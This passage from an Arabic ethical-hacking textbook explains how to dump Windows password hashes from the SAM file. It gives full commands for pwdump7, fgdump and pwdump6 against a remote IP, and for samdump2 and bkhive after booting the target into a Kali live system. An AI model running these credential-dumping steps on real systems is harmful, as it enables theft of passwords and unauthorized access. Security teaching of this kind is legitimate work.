‫اﻟﻣﻠف ‪ SAM‬ﻣن ﻣﺣﺗوﯾﺎﺗﮫ وذﻟك ﻧظرا ﻻن ھذا اﻟﻣﻠف ﻣﺣﻣﻰ ﻣن اﻟوﺻول اﻟﯾﮫ او ﺗﻌدﯾل ﻣﺣﺗوﯾﺎﺗﮫ‪ .‬ﺗﻔرﯾﻎ ﻗﺎﻋدة ﺑﯾﺎﻧﺎت ﻛﻠﻣﺔ اﻟﻣرور ﻋن‬
‫طرﯾﻖ اﺳﺗﺧدام وظﯾﻔﺔ اﻟوﯾﻧدوز اﻟداﺧﻠﯾﺔ واﻟﺗﻲ ﺗدﻋو ‪ .fetch the hashes‬وﻟﻛن ﻷن ھذه اﻟوظﺎﺋف ﺗﺗطﻠب اﻣﺗﯾﺎز اﻟوﺻول اﻷﻋﻠﻰ‬
‫)‪ ،(Admin Privilege‬ﻓﻣن اﻟﺿروري اﻟﺣﺻول أوﻻ ﻋﻠﻰ اﻣﺗﯾﺎزات اﻟوﺻول اﻟﻣﻧﺎﺳﺑﺔ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪340‬‬

‫)‪ The Local Security Authority Subsystem (LSASS‬ﯾﻌﻣل ﻣﻊ اﻣﺗﯾﺎز اﻟوﺻول اﻟﺿرورﯾﺔ ﻟﮭذا اﻟﻣﻠف‪ ،‬ﻟذﻟك ﯾﺳﺗﺧدم‬
‫‪ pwdump‬ﺗﻘﻧﯾﺔ ﺗﻌرف ﺑﺎﺳم ‪ DLL injection‬واﻟﺗﻲ ﺗﻌﻣل ﺗﺣت ﻋﻣﻠﯾﺔ ‪ LSASS‬وﺑﺎﻟﺗﺎﻟﻲ ﺗﻣﻠك اﻣﺗﯾﺎز اﻟوﺻول إﻟﻰ ﻣﻌﻠوﻣﺎت اﻟﮭﺎش‪.‬‬

‫‪ Pwdump7‬ھو ﺗطﺑﯾﻖ ﯾﻌﻣل ﻋﻠﻰ ﺗﻔرﯾﻎ ھﺎش ﻛﻠﻣﺎت اﻟﻣرور )‪ (OWFS‬ﻣن ﻗﺎﻋدة ﺑﯾﺎﻧﺎت ‪ Pwdump .NT’s SAM‬ﯾﻌﻣل ﻋﻠﻰ ﺗﻔرﯾﻎ‬
‫ھﺎﺷﺎت ﻛﻠﻣﺎت اﻟﻣرور )‪ (LM and NTLM‬ﻣن ﺣﺳﺎﺑﺎت اﻟﻣﺳﺗﺧدﻣﯾن اﻟﻣﺣﻠﯾﯾن ﻣن اﻟﻣﻠف )‪ .(SAM‬ھذا اﻟﺗطﺑﯾﻖ أو اﻷداة‪ ،‬ﯾﺗم ﺗﺷﻐﯾﻠﮭﺎ‬
‫ﻋن طرﯾﻖ اﺳﺗﺧراج اﻟﻣﻠف ‪ SAM‬واﻟﻣﻠف ‪ SYSTEM‬ﻣن ﻧظﺎم اﻟﻣﻠﻔﺎت وﻣن ﺛم ﯾﺗم اﺳﺗﺧراج اﻟﮭﺎش ﻣﻧﮫ‪ .‬واﺣدة ﻣن اﻟﻣﯾزات اﻟﻘوﯾﺔ ﻣن‬
‫‪ pwdump7‬ھو أﻧﮫ ﻗﺎدر أﯾﺿﺎ ﻋﻠﻰ ﺗﻔرﯾﻎ اﻟﻣﻠﻔﺎت اﻟﻣﺣﻣﯾﺔ‪ .‬اﺳﺗﺧدام ھذا اﻟﺑرﻧﺎﻣﺞ ﯾﺗطﻠب اﻣﺗﯾﺎزات إدارﯾﺔ ﻋﻠﻰ اﻟﻧظﺎم اﻟﺑﻌﯾد‪.‬‬

‫ﯾﻣﻛﻧك ﺗﺣﻣﯾل اﻹﺻدار اﻷﺧﯾر ﻣن ‪ pwdump7‬ﻣن اﻟﻣوﻗﻊ اﻟﺗﺎﻟﻲ‪:‬‬


‫‪http://www.tarasco.org/security/pwdump_7/index.html‬‬
‫ﻓﻲ ﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز ھذه اﻷداة ﺗﻌﻣل ﻣن ﺧﻼل ﺳطر اﻷواﻣر‪ ،‬ﻟذﻟك ﻧﻘوم ﺑﺎﻟﻧﻘر ﻋﻠﻰ اﻟزر ‪ shift‬ﻣﻊ اﻟﻧﻘر اﻷﯾﻣن ﻟﻠﻣﺎوس ﻋﻠﻰ‬ ‫‪-‬‬
‫اﻟﻣﺟﻠد اﻟذي ﯾﺣﺗوي ﻋﻠﻰ ‪ .pwdump7.exe‬واﻟﺗﻲ ﺗؤدى اﻟﻰ ظﮭور ﻗﺎﺋم ﻧﺧﺗﺎر ﻣﻧﮭﺎ ‪Open Command Windows here‬‬
‫ﻛﺎﻻﺗﻰ‪:‬‬

‫ﺑﻌد اﻟﻧﻘر ﻋﻠﯾﮫ ﺗؤدى اﻟﻰ ظﮭور اﻟﺷﺎﺷﺔ اﻟﺗﺎﻟﯾﺔ‪:‬‬ ‫‪-‬‬

‫ﻣﻠﺣوظﮫ‪ :‬ﻋﻧد اﻟﺗﻌﺎﻣل ﻣﻊ دوﻣﯾن ‪ active directory‬ﻓﺎﻧﮫ ﯾﻘوم ﺑﺗﺧزﯾن ﻛﻠﻣﺎت اﻟﻣرور ﻓﻲ اﻟﻣﻠف)‪.(ntds.dit‬‬
‫‪ -‬ﻧﻘوم اﻻن ﺑﺗﺷﻐﯾل اﻷداة ‪ pwdump7‬وذﻟك ﻋن طرﯾﻖ ﻛﺗﺎﺑﺔ ‪ pwdump7.exe‬ﻓﻲ ﺳطر اﻷواﻣر ﺑدون أي ﺗﻌﺑﯾرات ﻣﻊ اﻟﻧﻘر‬
‫ﻓوق ‪.Enter‬‬
‫‪ -‬ھذا ﺳوف ﯾؤدى اﻟﻰ اظﮭﺎر ﺟﻣﯾﻊ اﻟﮭﺎﺷﺎت اﻟﻣﺳﺟﻠﺔ ﻓﻲ ﻧظﺎم اﻟﺗﺷﻐﯾل اﻟوﯾﻧدوز أي ﻣن اﻟﻣﻠف ‪ SAM‬ﻛﺎﻻﺗﻰ‪:‬‬

‫ﻣﻠﺣوظﮫ‪ :‬ھذه اﻷداة ﺗﺣﺗﺎج اﻟﻰ ﺻﻼﺣﯾﺎت ‪.Administrator‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪341‬‬

‫‪ -‬ﻧﻘوم ﺑﺗﺧزﯾن ھذه اﻟﮭﺎش اوى ﺑﻣﻌﻧﻰ اﺧر ﻣﺣﺗوﯾﺎت اﻟﻣﻠف ‪ SAM‬ﻓﻲ ﻣﻠف اﺧر وﯾﻛون ﻋن طرﯾﻖ ﻛﺗﺎﺑﺔ > ‪pwdump7.exe‬‬
‫‪ c:\hashes.txt‬ﺛم اﻟﻧﻘر ﻋﻠﻰ ‪.Enter‬‬
‫‪ -‬ﺣﯾث ﯾﻘوم ھذا اﻻﻣر ﺑطﺑﺎﻋﺔ ﻣﺣﺗوﯾﺎﺗﮫ اﻟﻰ ﻣﻠف ﻧﺻﻲ ﻏﯾر ﻣﺣﻣﻰ ﯾﻣﻛﻧك اﻻطﻼع ﻋﻠﯾﮫ‪.‬‬
‫‪ -‬وھذا ھو وظﯾﻔﺔ ھذه اﻷداة وھو اﺳﺗﺧراج ﻣﺣﺗوﯾﺎت اﻟﻣﻠف ‪.SAM‬‬
‫‪ -‬ھذه اﻷداة ﻣﺗوﻓرة أﯾﺿﺎ ﻓﻲ ﻧظﺎم اﻟﺗﺷﻐﯾل ﻛﺎﻟﺊ‪.‬‬
‫اﻟﺻﯾﻐﺔ اﻟﻌﺎﻣﺔ ﻟﮭذه اﻷداة ﻛﺎﻻﺗﻰ‪:‬‬
‫)‪pwdump7.exe (Dump system passwords‬‬
‫)‪pwdump7.exe -s <samfile> <systemfile> (Dump passwords from files‬‬
‫)‪pwdump7.exe -d <filename> [destination] (Copy filename to destination‬‬
‫)‪pwdump7.exe -h (Show this help‬‬

‫‪ Fgdump‬أداه اﺧرى ﻟﺗﻔرﯾﻎ ﻛﻠﻣﺎت اﻟﻣرور ﻋﻠﻰ أﺟﮭزة وﯾﻧدوز ‪ .NT/2000/XP/2003/Vista‬ﺗﺄﺗﻲ ﻣدﻣﺟﺔ ﻣﻊ اﻟﻧظﺎم وﻟدﯾﮭﺎ ﻛل ﻗدرات‬
‫‪ Pwdump‬وﯾﻣﻛﻧﮭﺎ أﯾﺿﺎ اﻟﻘﯾﺎم ﺑﻌدد ﻣن اﻷﻣور اﻟﺣﯾوﯾﺔ اﻷﺧرى ﻣﺛل ﺗﻧﻔﯾذ اﻟﻣﻠﻔﺎت اﻟﻘﺎﺑﻠﺔ ﻟﻠﺗﻧﻔﯾذ ﻋن ﺑﻌد وﺗﻔرﯾﻎ ﻣﺣﺗوى أﻗراص اﻟﺗﺧزﯾن‬
‫اﻟﻣﺣﻣﯾﺔ ﺳواء ﻣن ﻋﻠﻰ ﺑﻌد أو ﻣﺣﻠﯾﺎ‪.‬‬

‫ھذﯾن اﻻداﺗﯾن ﯾﻣﻛﻧﮭﻣﺎ ﺗﻔرﯾﻎ اﻟﻣﻠف ‪ SAM‬ﻣن ﻋﻠﻰ اﻷﻧظﻣﺔ ﻋن ﺑﻌد أﯾﺿﺎ ﺑﺎﺳﺗﺧدام اﻟﺻﯾﻎ اﻷﺗﯾﺔ‪:‬‬
‫]‪C:\> fgdump.exe -h 192.168.0.10 -u An_Administrative_User [-p password‬‬
‫‪C:\> pwdump6.exe -u An_Administrative_User [-p password] 192.168.0.10‬‬

‫وﯾﺟب ان ﻧﺿﻊ ﻓﻲ اﻋﺗﺑﺎرﻧﺎ أن أي ﻣﺳﺗﺧدم ﻟﻛﻲ ﯾﺳﺗﺧدم ﻟﺗﻧﻔﯾذ ﺗﻔرﯾﻎ ھﺎش ﻛﻠﻣﺔ اﻟﻣرور ﻣن اﻟﻣﻠف ‪ SAM‬ﺳوف ﯾﺣﺗﺎج اﻟﻰ ﺗﺻرﯾﺢ اﻋﺗﻣﺎد‬
‫إدارﯾﺔ‪ .‬ﻓﻲ ھذا اﻟﺳﯾﻧﺎرﯾو‪ ،‬ﺳﯾطﻠب ﻣﻧك إدﺧﺎل ﻛﻠﻣﺔ اﻟﺳر ﻗﺑل ﺑدء ﺗﻔرﯾﻎ ﻛﻠﻣﺔ اﻟﻣرور‪.‬‬

‫اﻻﻣر‪ Fgdump‬ﺳوف ﯾﻘوم ﺑﺗﺧزﯾن اﻟﮭﺎش ﻓﻲ اﻟﻣﻠف ]‪[*.fgdump‬؛ أﻣﺎ ‪ pwdump7‬ﺳوف ﯾﻔرغ ﻣﺣﺗوﯾﺎت ‪ SAM‬إﻟﻰ اﻟﺷﺎﺷﺔ‪ .‬وﻟﻛن‬
‫ﻣﺎذا ﺗﻔﻌل إذا ﻛﺎن ﻟﯾس ﻟدﯾك وﺻول ﻣﺑﺎﺷر ﻟﻠﻧظﺎم اﻟﮭدف‪ ،‬أو ﻻ ﺗﻣﻠك ﺻﻼﺣﯾﺎت ﻣدﯾر اﻟﻧظﺎم ﻟﺗﻧﻔﯾذ ھذا اﻻﻣر ﺣﯾث ان اﻟﮭدف ﻣن اﺳﺗﺧداﻣﮫ‬
‫ھﻲ اﻟوﺻول اﻟﻰ ﺻﻼﺣﯾﺎت ﻣدﯾر اﻟﻧظﺎم‪.‬‬

‫)‪Extracting the Hashes from the SAM (Locally‬‬

‫ﻟﺣﺳن اﻟﺣظ‪ ،‬ھﻧﺎك طرﯾﻘﺔ ﻟﺗﺟﺎوز ھذه اﻟﻘﯾود ﻋﻠﻰ ﺣد ﺳواء‪ .‬ﻷﻧﻧﺎ ﻧﻧﺎﻗش اﻟﮭﺟﻣﺎت اﻟﻣﺣﻠﯾﺔ وﻷن ﻟدﯾﻧﺎ اﻟوﺻول اﻟﻔﻌﻠﻲ إﻟﻰ اﻟﻧظﺎم‪ ،‬وأﺑﺳط‬
‫طرﯾﻘﺔ ﻟﺗﺟﺎوز ھذه اﻟﺣﻣﺎﯾﺔ ھو اﻟﺗﻣﮭﯾد ﻟﻧظﺎم ﺗﺷﻐﯾل ﺑدﯾل ﻣﺛل ﻛﺎﻟﻲ‪ .‬ﺑواﺳطﺔ ﺗﻣﮭﯾد ھدﻓﻧﺎ ﻟﻧظﺎم اﻟﺗﺷﻐﯾل اﻟﺑدﯾل‪ ،‬ﻓﻧﺣن ﻗﺎدرون ﻋﻠﻰ ﺗﺟﺎوز‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪342‬‬

‫ﺗﺄﻣﯾن ‪ .Windows SAM‬ھذا ﻣﻣﻛن ﻷن ﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز ﻻ ﯾﺑدأ‪ ،‬اﻟﻘﻔل ﻟن ﯾﻌﻣل أﺑدا‪ ،‬وﻧﺣن أﺣرار ﻓﻲ اﻟوﺻول إﻟﻰ اﻟﻣﻠف ‪.SAM‬‬
‫وﻟﻛن ﻟﻸﺳف‪ ،‬ﻻ ﯾزال ﺗﺷﻔﯾر اﻟﻣﻠف ‪ ،SAM‬ﻟذﻟك ﻧﺣن ﺑﺣﺎﺟﺔ إﻟﻰ اﺳﺗﺧدام أداة ﻟﻠوﺻول إﻟﻰ اﻟﮭﺎش‪ .‬ﻟﺣﺳن اﻟﺣظ‪ ،‬ھذه اﻷداة اﻟﻣطﻠوﺑﺔ‬
‫ﻣدﻣﺟﺔ ﻓﻲ اﻟﻧظﺎم ﻛﺎﻟﻲ‪.‬‬

‫ﻣﻠﺣوظﮫ‪ :‬ھﻧﺎك اﻟﻌدﯾد ﻣن اﻟطرق اﻟﻣﺧﺗﻠﻔﺔ ﻹﻗﻼع )‪(boot‬اﻟﮭدف ﺑﻧظﺎم اﻟﺗﺷﻐﯾل اﻟﺑدﯾل‪ .‬أﺳﮭل اﻟطرق ﻋﺎدة ﻣﺎ ﺗﻧطوي ﻋﻠﻰ ﺗﺣﻣﯾل‬
‫اﻻﺻدار " ‪ ."Live CD\DVD‬ﺛم ﯾﺗم ﻧﺳﺧﮭﺎ إﻟﻰ أﺳطواﻧﺔ اﻗراص‪ ،‬واﻟﺗﻲ ﯾﻣﻛن إدراﺟﮭﺎ ﻓﻲ ﻣﺣرك اﻷﻗراص اﻟﺿوﺋﯾﺔ ﻣن اﻟﺟﮭﺎز‬
‫اﻟﮭدف‪ .‬ﺣﯾث أن اﻟﻌدﯾد ﻣن أﻧظﻣﺔ ﻣﺣرﻛﺎت اﻷﻗراص ﺳوف ﺗﺗﺣﻘﻖ ﻣن وﺟد أي أﻗراص ﺿوﺋﯾﺔ ﺑﮭﺎ ﺛم ﺗﻠﻘﺎﺋﯾﺎ ﺗﻘوم ﺑﺗﺷﻐﯾﻠﮭﺎ‪ .‬إذا ﻟم ﯾﻛن‬
‫اﻟﻧظﺎم اﻟﮭدف اﻟﺧﺎص ﺑك ﯾﻘوم ﺑﺗﺷﻐﯾل اﻷﻗراص اﻟﺿوﺋﯾﺔ ﺗﻠﻘﺎﺋﯾﺎ‪ ،‬ﻓﯾﻣﻛﻧك اﺳﺗﺧدام ﺗرﻛﯾﺑﺔ ﻣن اﻟﻣﻔﺎﺗﯾﺢ ﻋﻠﻰ ﺣﺳب ﻧوع ‪ BIOS‬اﻟﻣﺳﺗﺧدم‬
‫)‪ (F9 in HP Lap‬ﻟﺗﻐﯾﯾر ﺗرﺗﯾب اﻟﺗﻣﮭﯾد أو اﻟدﺧول اﻟﻰ إﻋدادات ‪ BIOS‬ﻟﺟﻌل اﻹﻗﻼع ﺑﯾدا ﻣن ﺧﻼل ﻣن ﻣﺣرك اﻷﻗراص اﻟﺿوﺋﯾﺔ‪.‬‬
‫ﻓﻲ ﺣﺎل ﻟم ﯾﻛن ﻟدﯾك ﻓﻲ اﻟﻧظﺎم اﻟذي ﺗﺳﺗﮭدﻓﮫ ﻣﺣرك أﻗراص ﺿوﺋﯾﺔ‪ ،‬ﯾﻣﻛﻧك أﯾﺿﺎ اﺳﺗﺧدام ‪ UNetbootin‬ﻹﻧﺷﺎء ﻣﺣرك أﻗراص‬
‫‪ USB‬ﻟﻠﺗﻣﮭﯾد‪ UNetbootin .‬ﯾﺳﻣﺢ ﻟك ﻟﺟﻌل إﺻدارات ﻟﯾﻧﻛس ﻛﺎﻟﻲ "‪ "live‬و اﻟﻌدﯾد ﻣن اﻟﺗوزﯾﻌﺎت اﻷﺧرى‪ .‬اﻟﺟﻣﻊ ﺑﯾن‬
‫‪ UNetbootin‬ﻣﻊ ﻛﺎﻟﻲ ‪ ISO‬ﯾﺳﻣﺢ ﻟك ﺑﺗﺷﻐﯾل ﻧظﺎم اﻟﺗﺷﻐﯾل ﺑﺄﻛﻣﻠﮫ ﻣن ﻣﺣرك ‪ ،USB‬ﻣﻣﺎ ﯾﺧﻠﻖ ﻣﺟﻣوﻋﺔ أدوات ﻗوﯾﺔ ﺟدا‪،‬‬
‫وﻣﺣﻣوﻟﺔ‪ .‬ﻛﻣﺎ ھو اﻟﺣﺎل ﻣﻊ ‪ ،live CD / DVD‬ﻗد ﺗﺣﺗﺎج ﻟﺗﻐﯾﯾر ﺗرﺗﯾب اﻟﺗﻣﮭﯾد ﻟﻧظﺎم اﻟﺿﺣﯾﺔ ﻗﺑل اﺳﺗﮭداﻓﮭﺎ‪.‬‬

‫‪ -‬ﺑﻌد ﺗﻣﮭﯾد اﻟﻧظﺎم اﻟﮭدف إﻟﻰ ﻧظﺎم اﻟﺗﺷﻐﯾل اﻟﺑدﯾل‪ ،‬ﻓﺈن أول ﺷﻲء ﻋﻠﯾك اﻟﻘﯾﺎم ﺑﮫ ھو ﺗﺣﻣﯾل ﻣﺣرك اﻷﻗراص اﻟﺛﺎﺑت اﻟﻣﺣﻠﻲ‪ .‬ﺗﺄﻛد‬
‫ﻣن ﺗﺣﻣﯾل ﻣﺣرك اﻷﻗراص اﻟذي ﯾﺣﺗوي ﻋﻠﻰ ﻣﺟﻠد ‪ .Windows‬ﯾﻣﻛﻧﻧﺎ ﺗﺣﻘﯾﻖ ذﻟك ﻣن ﺧﻼل ﻓﺗﺢ اﻟﺗرﻣﻧﺎل وﻛﺗﺎﺑﺔ اﻻﺗﻲ‪:‬‬
‫‪#mount©-t©ntfs-3g©-o©rw©/dev/sda1©/mnt/sda1‬‬
‫ﻣن اﻟﻣﮭم أن ﺗﻘوم ﺑﺗﺣﻣﯾل ﻣﺣرك اﻷﻗراص اﻟﺻﺣﯾﺢ وﻟﯾس ﻛل اﻷﻧظﻣﺔ اﻟﻣﺳﺗﮭدﻓﺔ ﺳﯾﻛون ﻟﮭﺎ ‪ ./dev/sda1‬إذا ﻛﻧت ﻏﯾر ﻣﺗﺄﻛد أي ﻣن‬
‫اﻟﻣﺣرﻛﺎت اﻟﺗﻲ ﺗﺣﻣل ﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز واﻟﺗﻲ ﺗﺣﺗﺎج اﻟﻰ ﺗﺣﻣﯾﻠﮭﺎ ﻋﻠﻰ ﻧظﺎم اﻟﺗﺷﻐﯾل اﻟﺑدﯾل‪ ،‬ﻓﯾﻣﻛﻧك ﺗﺷﻐﯾل اﻷﻣر "‪ "fdisk -l‬ﻣن ﺧﻼل‬
‫اﻟﺗرﻣﻧﺎل‪ .‬ﺳﺗﻘوم اﻷداة ‪ fdisk‬ﺑﺳرد ﻛﺎﻓﺔ ﻣﺣرﻛﺎت اﻷﻗراص اﻟﻣﺗوﻓرة ﻋﻠﻰ اﻟﻧظﺎم اﻟﺗﻲ ﺗﺳﺗﮭدﻓﮭﺎ‪ ،‬وﯾﻧﺑﻐﻲ أن ﺗﺳﺎﻋدك ﻓﻲ ﺗﺣدﯾد ﻣﺣرك‬
‫اﻷﻗراص اﻟذي ﺗﺣﺗﺎج إﻟﻰ ﺗﺣﻣﯾﻠﮫ)‪ .(mount‬ﻗد ﺗﺣﺗﺎج أﯾﺿﺎ إﻟﻰ إﻧﺷﺎء ﻧﻘطﺔ اﻟﺗﺣﻣﯾل )‪ (mount point‬ﻓﻲ اﻟﻣﺟﻠد ‪ /mnt‬ﺣﯾث ﺳوف ﯾﻛون‬
‫اﻟﺑواﺑﺔ اﻟﻰ اﻟﻣﺣرك اﻟذي ﯾﺣﻣل ﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز‪.‬‬
‫‪ -‬ﻟﻠﻘﯾﺎم ﺑذﻟك‪ ،‬ﯾﻣﻛﻧك ﺑﺑﺳﺎطﺔ اﺳﺗﺧدام اﻷﻣر "‪:"mkdir‬‬
‫‪#mkdir©/mnt/sda1‬‬

‫ﺑﻣﺟرد اﻻﻧﺗﮭﺎء ﻣن ﺗرﻛﯾب ﻣﺣرك اﻷﻗراص اﻟﻣﺣﻠﻲ ﺑﻧﺟﺎح ﻓﻲ ﻛﺎﻟﻲ‪ ،‬ﻓﺳوف ﺗﻛون ﻗﺎدرا ﻋﻠﻰ ﺗﺻﻔﺢ اﻟﻣﺣرك اﻟذي ﯾﺣﻣل ﻧظﺎم اﻟﺗﺷﻐﯾل‬
‫وﯾﻧدوز "\‪ ."C:‬ﯾﺟب أن ﺗﻛون اﻵن ﻗﺎدرا ﻋﻠﻰ اﻟﺗﻧﻘل إﻟﻰ ﻣﻠف ‪.SAM‬‬
‫‪ -‬ﯾﻣﻛﻧك اﻟﻘﯾﺎم ﺑذﻟك ﻋن طرﯾﻖ ﻛﺗﺎﺑﺔ اﻷﻣر اﻟﺗﺎﻟﻲ ﻓﻲ اﻟﺗرﻣﻧﺎل‪:‬‬
‫‪#cd©/mnt/sda1/Windows/system32/config‬‬

‫إذا ﻧﻔذ ﻛل ﺷﻲء ﻛﻣﺎ ھو ﻣﺧطط ﻟﮫ‪ ،‬ﯾﺟب أن ﺗﻛون ﻓﻲ اﻟﻣﺟﻠد اﻟذي ﯾﺣﺗوي ﻋﻠﻰ اﻟﻣﻠف ‪ .SAM‬ﻟﻌرض ﻣﺣﺗوﯾﺎت اﻟﻣﺟﻠد اﻟﺣﺎﻟﻲ ﻧﺳﺗﺧدم اﻻﻣر‬
‫‪ ls‬ﻓﻲ إطﺎر اﻟﺗرﻣﻧﺎل‪ ،‬ﯾﺟب أن ﺗﺷﺎھد ﻣﻠف ‪ .SAM‬ﯾﺑﯾن اﻟﺷﻛل اﻟﺗﺎﻟﻲ ﻟﻘطﺔ ﻟﻌرض ﻛل اﻟﺧطوات اﻟﻣطﻠوﺑﺔ ﻟﺗﺣدﯾد ﻣوﻗﻊ اﻟﻣﻠف ‪.SAM‬‬

‫‪1‬‬

‫‪2‬‬

‫‪3‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪343‬‬

‫‪4‬‬

‫‪5‬‬

‫‪6‬‬

‫اﻵن ﺑﻌد أن ﻗﻣﻧﺎ ﺑﺈﯾﺟﺎد اﻟﻣﻠف ‪ ،SAM‬ﯾﻣﻛﻧﻧﺎ اﺳﺗﺧدام أداة ﺗﺳﻣﻰ ‪ Samdump2‬ﻻﺳﺗﺧراج اﻟﮭﺎش‪ .‬ﻋﻧد ھذه اﻟﻧﻘطﺔ ﻟدﯾﻧﺎ اﻟﻘدرة ﻋﻠﻰ رؤﯾﺔ‬
‫وﻧﺳﺦ اﻟﻣﻠف ‪ ،SAM‬ﻓﻲ اﻟواﻗﻊ اﻟﺗﻐﻠب ﻋﻠﻰ ﻣﯾزة اﻷﻣن أوﻻ‪ ،‬وﻟﻛن ﻻ ﯾزال ﺗﺷﻔﯾر اﻟﻣﻠف ‪ .SAM‬ﻣن أﺟل ﻋرض ﻧﺳﺧﺔ ﻏﯾر ﻣﺷﻔرة ﻣن‬
‫اﻟﻣﻠف ‪ ،SAM‬ﻓﻧﺣن ﺑﺣﺎﺟﺔ ﻟﺗﺷﻐﯾل ‪ Samdump2. Samdump2‬ﯾﺳﺗﺧدم ﻣﻠف ﻋﻠﻰ اﻟﺟﮭﺎز اﻟﻣﺣﻠﻲ ﯾﺳﻣﻰ "‪ "system‬ﻟﻔك ﺗﺷﻔﯾر اﻟﻣﻠف‬
‫‪ .SAM‬ﻟﺣﺳن اﻟﺣظ‪ ،‬اﻟﻣﻠف "‪ "system‬ﯾﻘﻊ ﻓﻲ ﻧﻔس اﻟﻣﺟﻠد اﻟذي ﯾﻘﻊ ﻓﯾﮫ اﻟﻣﻠف ‪.SAM‬‬
‫ﻟﺗﺷﻐﯾل ‪ ،Samdump2‬ﻓﻧﻛﺗب اﻷﻣر "‪ "samdump2‬ﻣﺗﺑوﻋﺎ ﺑﺎﺳم وﻣوﻗﻊ اﻟﻣﻠف "‪ ،”system‬ﯾﻠﯾﮫ اﺳم وﻣوﻗﻊ اﻟﻣﻠف ‪ SAM‬اﻟذي ﻧرﯾد‬
‫ﻋرض ﻣﺣﺗوﯾﺎﺗﮫ‪.‬‬
‫‪ -‬ﻋﻧد ھذه اﻟﻧﻘطﺔ‪ ،‬ﻓﻧﺣن ﯾﻣﻛن اﺳﺗﺧراج ﻣﺣﺗوﯾﺎت اﻟﻣﻠف ‪ SAM‬ﻋن طرﯾﻖ ﺗﺷﻐﯾل اﻷﻣر اﻟﺗﺎﻟﻲ ﻓﻲ اﻟﺗرﻣﻧﺎل‪:‬‬
‫‪#samdump2©system©SAM©>©/tmp/hash.txt‬‬

‫ﺣﯾث ان اﻻﻣر ‪ samdump2‬ﺳوف ﯾﻘوم ﺑﻧﺳﺦ ﻣﺣﺗوﯾﺎت اﻟﻣﻠف ‪ SAM‬اﻟﻰ اﻟﻣﻠف ‪ /tmp/hash.txt‬اﻟﻐﯾر ﻣﺣﻣﻰ‪.‬‬
‫ﻣﻠﺣوظﮫ‪ :‬اﻟوﺻول إﻟﻰ اﻟﮭﺎش ﻓﻲ ﺑﻌض أﻧظﻣﺔ اﻟوﯾﻧدوز ﻗد ﺗﺗطﻠب ﺧطوة إﺿﺎﻓﯾﺔ‪ Bkhive .‬ھو اﻷداة اﻟﺗﻲ ﺗﺳﻣﺢ ﻟك ﺑﺎﺳﺗﺧراج‬
‫)‪ (Syskey bootkey‬ﻣن اﻟﻣﻠف ‪ .system‬ﻗد ﯾﻛون ﻣن اﻟﺿروري اﺳﺗﺧدام ‪ bkhive‬ﻻﺳﺗﺧراج ﻣﻔﺗﺎح اﻟﻧظﺎم ﻣن أﺟل اﻟﻛﺷف اﻟﺗﺎم‬
‫ﻋن ھﺎﺷﺎت ﻛﻠﻣﺔ اﻟﻣرور‪.‬‬
‫ﻟﺗﺷﻐﯾل‪ ، bkhive‬ﻓﻧﺣن ﻓﻲ ﺣﺎﺟﺔ ﻟﺗوﻓﯾر ﻧظﺎم اﻟﻣﻠﻔﺎت واﺳم اﻟﻣﻠف اﻟﻧﺎﺗﺞ واﻟﺗﻲ ﺳوف ﯾﺣﺗوي ﻋﻠﻰ اﻟﻣﻔﺗﺎح اﻟﻣﺳﺗﺧرﺟﺔ‪ .‬ﻟﺣﺳن اﻟﺣظ‪،‬‬
‫وﻛﻣﺎ ذﻛر‪ ،‬ﻓﺈن ﻣﺎﯾﻛروﺳوﻓت ﻧوع ﻣﺎ ﯾﻛﻔﻲ ﻟﻠﺣﻔﺎظ ﻋﻠﻰ اﻟﻣﻠف "‪ "system‬اﻟﻣﻠف ﻓﻲ ﻧﻔس اﻟﻣﺟﻠد اﻟذي ﯾوﺟد ﻓﯾﮫ اﻟﻣﻠف ‪ .SAM‬ﻛﻣﺎ‬
‫ﻧوﻗش ﺳﺎﺑﻘﺎ‪ ،‬وﻋﺎدة ﻣﺎ ﯾوﺟد ھذا اﻟﻣﻠف ﻓﻲ اﻟﻣﺟﻠد‪. Windows/system32/config‬‬
‫ﻋﻠﻰ اﻓﺗراض إﻧك ﺑﺎﻟﻔﻌل ﻓﻲ اﻟﻣﺟﻠد اﻟذي ﯾﺣﺗوي ﻋﻠﻰ اﻟﻣﻠف ‪ system‬وﻣﻠﻔﺎت ‪ ،SAM‬ﯾﻣﻛﻧك اﻻﺳﺗﻔﺎدة ‪ bkhive‬ﻻﺳﺗﺧراج اﻟﻣﻔﺗﺎح ﻣﻊ‬
‫اﻷﻣر اﻟﺗﺎﻟﻲ‪:‬‬
‫‪#bkhive system sys_key.txt‬‬
‫ﻋﻧد ھذه اﻟﻧﻘطﺔ ﯾﻣﻛﻧﻧﺎ ﻣواﺻﻠﺔ ھﺟوﻣﻧﺎ ﺑﺎﺳﺗﺧدام ‪ .Samdump2‬ﻓﻲ ھذه اﻟﺣﺎﻟﺔ‪ ،‬ﻓﺳوف ﯾﺳﺗﻔﺎد ‪ Samdump2‬ﻣن اﻟﻣﻠف‬
‫‪ sys_key.txt‬اﻟﺗﻲ أﻧﺷﺋت ﺣدﯾﺛﺎ ﻟدﯾﻧﺎ ﻛﻣﺎ ھو ﻣﺑﯾن أدﻧﺎه‪.‬‬
‫‪#samdump2 SAM sys_key.txt > /tmp/hash.txt‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪344‬‬

